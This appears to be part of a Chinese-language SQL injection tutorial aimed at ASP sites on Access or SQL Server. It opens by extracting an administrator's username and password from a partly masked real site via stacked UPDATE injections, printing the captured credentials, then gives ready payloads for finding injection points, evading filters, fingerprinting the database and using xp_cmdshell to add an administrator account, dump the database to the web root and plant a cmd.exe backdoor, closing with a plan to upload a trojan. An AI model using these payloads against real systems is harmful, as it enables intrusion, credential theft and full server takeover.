SQL注入漏洞的攻防策略(6)

　　好，接下來我們就取該表的字段名

　　http://******/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1

　　col_name(object_id(admin),1) from admin) where id=103534;--

　　得到第1個(gè)字段為：id

　　http://******/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1

　　col_name(object_id(admin),2) from admin) where id=103534;--

　　得到第2個(gè)字段為：username

　　http://******/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1

　　col_name(object_id(admin),3) from admin) where id=103534;--

　　得到第2個(gè)字段為：password

　　到此，管理員列表的3個(gè)關(guān)鍵字段已經(jīng)給我們拿到，接下來要拿用戶名和密碼就比較省力了，首先拿

　　管理員的id值，這個(gè)比較簡單，我就不再詳細(xì)說了。

　　我們拿到的id值是44

　　http://******/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1

　　username from admin where id=44) where id=103534;--

　　將該管理員的用戶名更新到email項(xiàng) ，拿到的username為：gscdjmp3

　　http://******/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1

　　password from admin where id=44) where id=103534;--

　　將該管理員的密碼更新到email項(xiàng)，拿到的password為：XZDC9212CDJ

　　怎么樣，拿到密碼了吧?

　　SQL注入不完全思路與防注入程序

　　<一>SQL注入簡介

　　許多網(wǎng)站程序在編寫時(shí)，沒有對(duì)用戶輸入數(shù)據(jù)的合法性進(jìn)行判斷，使應(yīng)用程序存在安全隱患。用戶可

　　以提交一段數(shù)據(jù)庫查詢代碼，(一般是在瀏覽器地址欄進(jìn)行,通過正常的www端口訪問)根據(jù)程序返回的結(jié)

　　果，獲得某些他想得知的數(shù)據(jù)，這就是所謂的SQL Injection，即SQL注入。

　　<二>SQL注入思路

　　思路最重要。其實(shí)好多人都不知道SQL到底能做什么呢?這里總結(jié)一下SQL注入入侵的總體的思路：

　　1. SQL注入漏洞的判斷，即尋找注入點(diǎn)

　　2. 判斷后臺(tái)數(shù)據(jù)庫類型

　　3. 確定XP_CMDSHELL可執(zhí)行情況;若當(dāng)前連接數(shù)據(jù)的帳號(hào)具有SA權(quán)限，且master.dbo.xp_cmdshell擴(kuò)

　　展存儲(chǔ)過程(調(diào)用此存儲(chǔ)過程可以直接使用操作系統(tǒng)的shell)能夠正確執(zhí)行，則整個(gè)計(jì)算機(jī)可以通過幾種

　　方法完全控制，也就完成了整個(gè)注入過程，否則繼續(xù)：

　　1. 發(fā)現(xiàn)WEB虛擬目錄

　　2. 上傳ASP木馬;

　　3. 得到管理員權(quán)限

　　具體步驟：

　　一、SQL注入漏洞的判斷

　　如果以前沒玩過注入，請(qǐng)把IE菜單-工具-Internet選項(xiàng)-高級(jí)-顯示友好HTTP錯(cuò)誤信息前面的勾去掉

　　。

　　為了把問題說明清楚，以下以HTTP://www.163.com/news.asp?id=xx(這個(gè)地址是假想的)，為例進(jìn)行

　　分析，xx可能是整型，也有可能是字符串。

　　1、整型參數(shù)的判斷

　　當(dāng)輸入的參數(shù)xx為整型時(shí)，通常news.asp中SQL語句原貌大致如下：

　　select * from 表名 where 字段=xx，所以可以用以下步驟測試SQL注入是否存在。

　　最簡單的判斷方法

　　HTTP://www.163.com/news.asp?id=xx’(附加一個(gè)單引號(hào))，

　　此時(shí)news.asp中的SQL語句變成了

　　select * from 表名 where 字段=xx’，

　　如果程序沒有過濾好“’”的話，就會(huì)提示 news.asp運(yùn)行異常;但這樣的方法雖然很簡單，但并不

　　是最好的，因?yàn)椋?/p>

　　first,不一定每臺(tái)服務(wù)器的IIS都返回具體錯(cuò)誤提示給客戶端，如果程序中加了cint(參數(shù))之類語句

　　的話，SQL注入是不會(huì)成功的，但服務(wù)器同樣會(huì)報(bào)錯(cuò)，具體提示信息為處理 URL 時(shí)服務(wù)器上出錯(cuò)。請(qǐng)和系

　　統(tǒng)管理員聯(lián)絡(luò)。

　　second，目前大多數(shù)程序員已經(jīng)將“’“ 過濾掉，所以用” ’”測試不到注入點(diǎn)，所以一般使用經(jīng)

　　典的1=1和1=2測試方法，見下文：

　　HTTP://www.163.com/news.asp?id=xx and 1=1, news.asp運(yùn)行正常，

　　而且與HTTP://www.163.com/news.asp?id=xx運(yùn)行結(jié)果相同;

　　HTTP://www.163.com/news.asp?id=xx and 1=2, news.asp運(yùn)行異常;(這就是經(jīng)典的 1=1 1=2 判斷方法

　　)

　　如果以上面滿足，news.asp中就會(huì)存在SQL注入漏洞，反之則可能不能注入。

　　2、字符串型參數(shù)的判斷

　　方法與數(shù)值型參數(shù)判斷方法基本相同

　　當(dāng)輸入的參數(shù)xx為字符串時(shí)，通常news.asp中SQL語句原貌大致如下：

　　select * from 表名 where 字段='xx'，所以可以用以下步驟測試SQL注入是否存在。

　　HTTP://www.163.com/news.asp?id=xx’(附加一個(gè)單引號(hào))，此時(shí)news.asp中的SQL語句變成了

　　select * from 表名 where 字段=xx’，news.asp運(yùn)行異常;

　　HTTP://www.163.com/news.asp?id=xx and '1'='1', news.asp運(yùn)行正常，

　　而且與HTTP://www.163.com/news.asp?id=xx運(yùn)行結(jié)果相同;

　　HTTP://www.163.com/news.asp?id=xx and '1'='2', news.asp運(yùn)行異常;

　　如果以上滿足，則news.asp存在SQL注入漏洞，反之則不能注入

　　3、特殊情況的處理

　　有時(shí)ASP程序員會(huì)在程序員過濾掉單引號(hào)等字符，以防止SQL注入。此時(shí)可以用以下幾種方法試一試。

　?、俅笮《ɑ旌戏ǎ河捎赩BS并不區(qū)分大小寫，而程序員在過濾時(shí)通常要么全部過濾大寫字符串，要么

　　全部過濾小寫字符串，而大小寫混合往往會(huì)被忽視。如用SelecT代替select,SELECT等;

　　②UNICODE法：在IIS中，以UNICODE字符集實(shí)現(xiàn)國際化，我們完全可以IE中輸入的字符串化成UNICODE

　　字符串進(jìn)行輸入。如+ =%2B，空格=%20 等;URLEncode信息參見附件一;

　　③ASCII碼法：可以把輸入的部分或全部字符全部

　　<4>出了上述方法以外，還有個(gè)更簡單的方法就是使用現(xiàn)成的工具像NB聯(lián)盟的NBSI就是一款很不錯(cuò)

　　的工具，目前最新的版本為2.2

　　二、判斷數(shù)據(jù)庫類型

　　不同的數(shù)據(jù)庫的函數(shù)、注入方法都是有差異的，所以在注入之前，我們還要判斷一下數(shù)據(jù)庫的類型。

　　一般ASP最常搭配的數(shù)據(jù)庫是Access和SQLServer，網(wǎng)上超過99%的網(wǎng)站都是其中之一。

　　怎么讓程序告訴你它使用的什么數(shù)據(jù)庫呢?來看看：

　　SQLServer有一些系統(tǒng)變量，如果服務(wù)器IIS提示沒關(guān)閉，并且SQLServer返回錯(cuò)誤提示的話，那可以

　　直接從出錯(cuò)信息獲取，方法如下：

　　HTTP://www.163.com/news.asp?id=xx;and user>0

　　這句語句很簡單，但卻包含了SQLServer特有注入方法的精髓，我自己也是在一次無意的測試中發(fā)現(xiàn)

　　這種效率極高的猜解方法。讓我看來看看它的含義：首先，前面的語句是正常的，重點(diǎn)在and user>0，

　　我們知道，user是SQLServer的一個(gè)內(nèi)置變量，它的值是當(dāng)前連接的用戶名，類型為nvarchar。拿一個(gè)

　　nvarchar的值跟int的數(shù)0比較，系統(tǒng)會(huì)先試圖將nvarchar的值轉(zhuǎn)成int型，當(dāng)然，轉(zhuǎn)的過程中肯定會(huì)出錯(cuò)

　　，SQLServer的出錯(cuò)提示是：將nvarchar值 ”abc” 轉(zhuǎn)換數(shù)據(jù)類型為 int

　　的列時(shí)發(fā)生語法錯(cuò)誤，呵呵，abc正是變量user的值，這樣，不廢吹灰之力就拿到了數(shù)據(jù)庫的用戶名。在

　　以后的篇幅里，大家會(huì)看到很多用這種方法的語句。 順便說幾句，眾所周知，SQLServer的用戶sa是個(gè)等

　　同Adminstrators權(quán)限的角色，拿到了sa權(quán)限，幾乎肯定可以拿到主機(jī)的 Administrator了。上面的方法

　　可以很方便的測試出是否是用sa登錄，要注意的是：如果是sa登錄，提示是將”dbo”轉(zhuǎn)換成int的列發(fā)生

　　錯(cuò)誤，而不是”sa”。

　　如果服務(wù)器IIS不允許返回錯(cuò)誤提示，那怎么判斷數(shù)據(jù)庫類型呢?我們可以從Access和SQLServer和區(qū)

　　別入手，Access和

　　SQLServer都有自己的系統(tǒng)表，比如存放數(shù)據(jù)庫中所有對(duì)象的表，Access是在系統(tǒng)表[msysobjects]中，但

　　在Web環(huán)境下讀該表會(huì)提示“沒有權(quán)限”，SQLServer是在表[sysobjects]中，在Web環(huán)境下可正常讀取。

　　在確認(rèn)可以注入的情況下，使用下面的語句：

　　HTTP://www.163.com/news.asp?id=xx ;and (select count(*) from sysobjects)>0

　　HTTP://www.163.com/news.asp?id=xx ;and (select count(*) from msysobjects)>0

　　如果數(shù)據(jù)庫是SQLServer，那么第一個(gè)網(wǎng)址的頁面與原頁面HTTP://www.163.com/news.asp?id=xx是大

　　致相同的;而第二個(gè)網(wǎng)址，由于找不到表msysobjects，會(huì)提示出錯(cuò)，就算程序有容錯(cuò)處理，頁面也與原

　　頁面完全不同。

　　如果數(shù)據(jù)庫用的是Access，那么情況就有所不同，第一個(gè)網(wǎng)址的頁面與原頁面完全不同;第二個(gè)網(wǎng)址

　　，則視乎數(shù)據(jù)庫設(shè)置是否允許讀該系統(tǒng)表，一般來說是不允許的，所以與原網(wǎng)址也是完全不同。大多數(shù)情

　　況下，用第一個(gè)網(wǎng)址就可以得知系統(tǒng)所用的數(shù)據(jù)庫類型，第二個(gè)網(wǎng)址只作為開啟IIS錯(cuò)誤提示時(shí)的驗(yàn)證。

　　三、確定XP_CMDSHELL可執(zhí)行情況

　　若當(dāng)前連接數(shù)據(jù)的帳號(hào)具有SA權(quán)限，且master.dbo.xp_cmdshell擴(kuò)展存儲(chǔ)過程(調(diào)用此存儲(chǔ)過程可以

　　直接使用操作系統(tǒng)的shell)能夠正確執(zhí)行，則整個(gè)計(jì)算機(jī)可以通過以下幾種方法完全控制，以后的所有步

　　驟都可以省

　　1、HTTP://www.163.com/news.asp?id=xx and user>;0 news.asp執(zhí)行異常但可以得到當(dāng)前連接數(shù)據(jù)

　　庫的用戶名(若顯示dbo則代表SA)。

　　2、HTTP://www.163.com/news.asp?id=xx and db_name()>0 news.asp執(zhí)行異常但可以得到當(dāng)前連接

　　的數(shù)據(jù)庫名。

　　3、HTTP://www.163.com/news.asp?id=xx;exec master..xp_cmdshell “net user aaa bbb /add”

　　-- (master是SQL-SERVER的主數(shù)據(jù)

　　庫;名中的分號(hào)表示SQL-SERVER執(zhí)行完分號(hào)前的語句名，繼續(xù)執(zhí)行其后面的語句;“—”號(hào)是注解，表示

　　其后面的所有內(nèi)容僅為注釋，系統(tǒng)并不執(zhí)行)可以直接增加操作系統(tǒng)帳戶aaa,密碼為bbb。

　　4、HTTP://www.163.com/news.asp?id=xx;exec master..xp_cmdshell “net localgroup

　　administrators aaa /add”-- 把剛剛增加

　　的帳戶aaa加到administrators組中。

　　5、HTTP://www.163.com/news.asp?id=xx;backuup database 數(shù)據(jù)庫名 to

　　disk='c:/inetpub/wwwroot/save.db' 則把得到的數(shù)據(jù)內(nèi)容

　　全部備份到WEB目錄下，再用HTTP把此文件下載(當(dāng)然首選要知道WEB虛擬目錄)。

　　6、通過復(fù)制CMD創(chuàng)建UNICODE漏洞

　　HTTP://www.163.com/news.asp?id=xx;exec master.dbo.xp_cmdshell “copy

　　c:/winnt/system32/cmd.exe

　　c:/inetpub/scripts/cmd.exe” 便制造了一個(gè)UNICODE漏洞，通過此漏洞的利用方法，便完成了對(duì)整

　　個(gè)計(jì)算機(jī)的控制(當(dāng)然首選要知道WEB虛擬目錄)。

　　這樣你就成功的完成了一次SQL注入攻擊，先別興奮，在實(shí)踐時(shí)你就會(huì)發(fā)現(xiàn)這比理論要難的多會(huì)有更

　　多的困難等著你come over ，下面GO ON如果上述條件不成立則需繼續(xù)奮斗(要掛馬了：))